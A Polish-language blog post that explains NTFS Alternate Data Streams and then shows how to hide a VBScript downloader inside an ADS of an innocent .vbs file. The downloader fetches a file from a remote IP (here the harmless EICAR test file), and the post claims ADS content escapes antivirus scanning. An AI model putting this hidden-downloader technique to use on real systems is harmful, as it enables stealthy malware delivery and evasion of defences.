Wykorzystanie funkcjonalności ADS systemu plików NTFS w celu uruchomienia złośliwej aplikacji
Oficjalne zastosowanie ADS-ów
Jako jedno z zastosowań ADS (AlternativeData Stream) przedstawia pliki "Zone Identifier" będące rozszerzeniem dla pliku podstawowego, a zawierające metadane - na przykład informacje o pochodzeniu.
Przeglądarka internetowa jest w stanie oznaczyć plik odpowiednią wartością Zone-Identifier dzięki temu przy próbie otwarcia go z poziomu Windowsa otrzymamy taki komunikat bezpieczeństwa:
 |
| Informacja, że dany plik może być niebezpieczny ponieważ pochodzi z internetu. |
Kolejnym założeniem ADS miała być kompatybilność między systemami MacOS, a Windows ponieważ swego czasu Windows nie zapisywał metadanych o utworach muzycznych i kopiowanie utworów z jednego systemu na drugi kończyło się brakiem możliwości sprawdzenia autora, tytułu utworu, zespołu...lub nawet brakiem możliwości skopiowania danych ze względu na brak pełnej kompatybilności NTFS (Windows), a HFS (Apple).
Po więcej informacji o możliwościach rozszerzonych strumieni danych odsyłam do dokumentacji oraz kilku innych źródeł [1][2][3].
Mniej oficjalne zastosowanie ADS :)
Jesteśmy w katalogu Workdir, który jest pusty:
Utworzymy sobie "czysty" pliczek *.vbs oraz eicar.txt (służy do testowania antywirusów - powinien zawsze być wykrywany):
No i jest wykrywany. :)
A .vbs tworzy nam niewinne okienko.
Teraz zrobimy sobie ADS'iątko. Jest to tak proste jak dodanie dwukropka do nazwy już istniejącego pliku. Tym razem namieszamy!
I wpisujemy tam takie cosik:
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", "http://xxx.xxx.xx.164/eicar/eicar.txt", False
xHttp.Send
with bStrm
.type = 1 '//binary
.open
.write xHttp.responseBody
.savetofile "w:\WorkDir\eicar.txt", 2 '//overwrite
end with
Uruchamiamy i...
...downloader pobiera złośliwy plik. :)
Ciekawostka - ADS nie są skanowane przez anwywirusy/antymalware.
Myślę, że na dziś to by było wszystko. Zachęcam do własnoręcznego zgłębienia tematów i możliwości bo gdy dwa lata temu odkryłem ADS i jego właściwości to wszystko działało. Piszę ten artykuł dziś z nowymi screenshootami i skryptami...i jest tak samo.
ツ
Brak komentarzy:
Prześlij komentarz